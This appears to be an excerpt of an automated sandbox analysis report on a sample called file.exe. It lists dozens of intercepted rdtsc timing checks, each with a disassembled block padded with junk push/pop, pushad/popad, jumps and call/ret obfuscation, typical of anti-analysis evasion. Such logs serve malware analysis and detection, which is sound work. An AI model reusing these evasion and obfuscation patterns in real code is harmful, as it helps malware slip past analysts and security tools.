Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 759BED second address: 759C00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8838CEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 759C00 second address: 759C06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76BBCE second address: 76BBD8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F66E8838CECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77ADA4 second address: 77ADA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73E732 second address: 73E74C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F66E8838CE6h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F66E8838CECh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 778DB8 second address: 778DC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 778EFE second address: 778F03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 779055 second address: 779059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 779059 second address: 779074 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8838CF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 779074 second address: 77907A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7791D2 second address: 7791DD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jns 00007F66E8838CE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7791DD second address: 7791FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F66E8C719E8h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 779725 second address: 779731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 779731 second address: 779740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 779740 second address: 779744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7799D4 second address: 7799D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7799D8 second address: 7799E2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F66E8838CE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7799E2 second address: 7799EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7799EB second address: 7799F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7799F0 second address: 7799FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007F66E8C719D6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 779D0B second address: 779D0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76FAD9 second address: 76FADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76FADF second address: 76FAE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76FAE9 second address: 76FAEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76FAEF second address: 76FAF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76FAF4 second address: 76FB1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F66E8C719E1h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f je 00007F66E8C719F6h 0x00000015 pushad 0x00000016 jg 00007F66E8C719D6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76FB1E second address: 76FB28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77A74D second address: 77A788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66E8C719E1h 0x00000009 jmp 00007F66E8C719E5h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F66E8C719DCh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77A788 second address: 77A7B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8838CF9h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f jns 00007F66E8838CE6h 0x00000015 pop ebx 0x00000016 push edi 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77A7B7 second address: 77A7BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77A7BC second address: 77A7D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F66E8838CEFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77A7D0 second address: 77A7D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77A927 second address: 77A931 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F66E8838CE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77A931 second address: 77A94C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8C719E7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77A94C second address: 77A95A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F66E8838CECh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D702 second address: 77D707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77CDF9 second address: 77CE15 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 js 00007F66E8838CE6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F66E8838CEDh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77DDC7 second address: 77DDCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77DDCB second address: 77DDD5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78180D second address: 781832 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8C719DEh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F66E8C719E1h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78438A second address: 78438E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78496C second address: 784973 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 784AFA second address: 784B0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push ebx 0x00000008 jl 00007F66E8838CECh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7489B6 second address: 7489C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7489C1 second address: 7489C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7898D8 second address: 789934 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F66E8C719D6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F66E8C719E5h 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 jmp 00007F66E8C719E8h 0x0000001d mov eax, dword ptr [eax] 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F66E8C719E8h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 789934 second address: 78998B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F66E8838CFFh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e jno 00007F66E8838CFDh 0x00000014 pop eax 0x00000015 mov di, bx 0x00000018 call 00007F66E8838CE9h 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78998B second address: 789991 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 789991 second address: 7899C8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F66E8838CF9h 0x00000008 jmp 00007F66E8838CF3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 ja 00007F66E8838CF0h 0x00000016 jmp 00007F66E8838CEAh 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7899C8 second address: 7899CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A0D8 second address: 78A0DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A61B second address: 78A61F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A61F second address: 78A62F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A62F second address: 78A634 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A81B second address: 78A820 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A906 second address: 78A90C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78AB5A second address: 78AB5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78AB5E second address: 78AB64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78AB64 second address: 78AB81 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F66E8838CE8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F66E8838CEEh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78B9EC second address: 78B9F2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78B9F2 second address: 78BA6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8838CF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+12476DB4h], ecx 0x00000012 push 00000000h 0x00000014 jmp 00007F66E8838CF3h 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ecx 0x0000001e call 00007F66E8838CE8h 0x00000023 pop ecx 0x00000024 mov dword ptr [esp+04h], ecx 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc ecx 0x00000031 push ecx 0x00000032 ret 0x00000033 pop ecx 0x00000034 ret 0x00000035 jmp 00007F66E8838CEBh 0x0000003a push eax 0x0000003b pushad 0x0000003c pushad 0x0000003d jbe 00007F66E8838CE6h 0x00000043 js 00007F66E8838CE6h 0x00000049 popad 0x0000004a pushad 0x0000004b push eax 0x0000004c pop eax 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78D58F second address: 78D644 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8C719E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push esi 0x0000000c jmp 00007F66E8C719E0h 0x00000011 pop esi 0x00000012 jmp 00007F66E8C719E8h 0x00000017 popad 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007F66E8C719D8h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 00000014h 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 push 00000000h 0x00000035 mov dword ptr [ebp+122D2051h], edx 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push ebx 0x00000040 call 00007F66E8C719D8h 0x00000045 pop ebx 0x00000046 mov dword ptr [esp+04h], ebx 0x0000004a add dword ptr [esp+04h], 00000019h 0x00000052 inc ebx 0x00000053 push ebx 0x00000054 ret 0x00000055 pop ebx 0x00000056 ret 0x00000057 xchg eax, ebx 0x00000058 jmp 00007F66E8C719DDh 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 push esi 0x00000061 jmp 00007F66E8C719E1h 0x00000066 pop esi 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78D644 second address: 78D64A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78EC2D second address: 78EC33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78EC33 second address: 78EC3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78F632 second address: 78F67E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 and di, 65D3h 0x0000000e push 00000000h 0x00000010 add dword ptr [ebp+122D33ACh], edi 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007F66E8C719D8h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 00000014h 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 adc di, 7FD2h 0x00000037 xchg eax, ebx 0x00000038 push ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F66E8C719DFh 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78E9B8 second address: 78E9C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F66E8838CE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78FF3D second address: 78FF56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8C719DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007F66E8C719E4h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78FF56 second address: 78FF5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 793321 second address: 793325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 793325 second address: 793329 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 794A29 second address: 794A9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8C719DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a ja 00007F66E8C719E0h 0x00000010 nop 0x00000011 cmc 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007F66E8C719D8h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e mov dword ptr [ebp+12450AE6h], edi 0x00000034 push 00000000h 0x00000036 xchg eax, esi 0x00000037 jmp 00007F66E8C719DCh 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F66E8C719E2h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 794A9D second address: 794AA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F66E8838CE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795A99 second address: 795B27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F66E8C719E9h 0x0000000f jl 00007F66E8C719D6h 0x00000015 popad 0x00000016 pop edx 0x00000017 nop 0x00000018 jmp 00007F66E8C719E6h 0x0000001d push 00000000h 0x0000001f pushad 0x00000020 mov dword ptr [ebp+122D1BA8h], esi 0x00000026 pushad 0x00000027 stc 0x00000028 mov cx, FB1Ah 0x0000002c popad 0x0000002d popad 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebx 0x00000033 call 00007F66E8C719D8h 0x00000038 pop ebx 0x00000039 mov dword ptr [esp+04h], ebx 0x0000003d add dword ptr [esp+04h], 00000014h 0x00000045 inc ebx 0x00000046 push ebx 0x00000047 ret 0x00000048 pop ebx 0x00000049 ret 0x0000004a mov ebx, dword ptr [ebp+122D1CCAh] 0x00000050 mov dword ptr [ebp+122D1BA2h], edx 0x00000056 xchg eax, esi 0x00000057 jo 00007F66E8C719DAh 0x0000005d push edi 0x0000005e pushad 0x0000005f popad 0x00000060 pop edi 0x00000061 push eax 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 popad 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 796AC0 second address: 796AD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 jl 00007F66E8838CF8h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795C55 second address: 795C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 796AD3 second address: 796AD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795C5B second address: 795C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F66E8C719E5h 0x0000000f jmp 00007F66E8C719DFh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795C79 second address: 795D1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F66E8838CE6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f pushad 0x00000010 mov dword ptr [ebp+122D3684h], edi 0x00000016 popad 0x00000017 push dword ptr fs:[00000000h] 0x0000001e push 00000000h 0x00000020 push ebp 0x00000021 call 00007F66E8838CE8h 0x00000026 pop ebp 0x00000027 mov dword ptr [esp+04h], ebp 0x0000002b add dword ptr [esp+04h], 00000015h 0x00000033 inc ebp 0x00000034 push ebp 0x00000035 ret 0x00000036 pop ebp 0x00000037 ret 0x00000038 add dword ptr [ebp+122D2AFAh], ebx 0x0000003e mov dword ptr fs:[00000000h], esp 0x00000045 mov edi, dword ptr [ebp+122D27B1h] 0x0000004b mov bx, 80C1h 0x0000004f mov eax, dword ptr [ebp+122D09B1h] 0x00000055 push 00000000h 0x00000057 push edi 0x00000058 call 00007F66E8838CE8h 0x0000005d pop edi 0x0000005e mov dword ptr [esp+04h], edi 0x00000062 add dword ptr [esp+04h], 00000019h 0x0000006a inc edi 0x0000006b push edi 0x0000006c ret 0x0000006d pop edi 0x0000006e ret 0x0000006f jc 00007F66E8838CECh 0x00000075 add dword ptr [ebp+122D22B5h], edx 0x0000007b push FFFFFFFFh 0x0000007d xor bx, EE5Ah 0x00000082 nop 0x00000083 push eax 0x00000084 push edx 0x00000085 jbe 00007F66E8838CF5h 0x0000008b jmp 00007F66E8838CEFh 0x00000090 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 796BFA second address: 796BFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7978DA second address: 79793F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F66E8838CE6h 0x00000009 jno 00007F66E8838CE6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp], eax 0x00000015 je 00007F66E8838CE9h 0x0000001b movzx edi, bx 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebp 0x00000023 call 00007F66E8838CE8h 0x00000028 pop ebp 0x00000029 mov dword ptr [esp+04h], ebp 0x0000002d add dword ptr [esp+04h], 00000015h 0x00000035 inc ebp 0x00000036 push ebp 0x00000037 ret 0x00000038 pop ebp 0x00000039 ret 0x0000003a jmp 00007F66E8838CEFh 0x0000003f push 00000000h 0x00000041 jp 00007F66E8838CF1h 0x00000047 push eax 0x00000048 push ecx 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79793F second address: 797943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
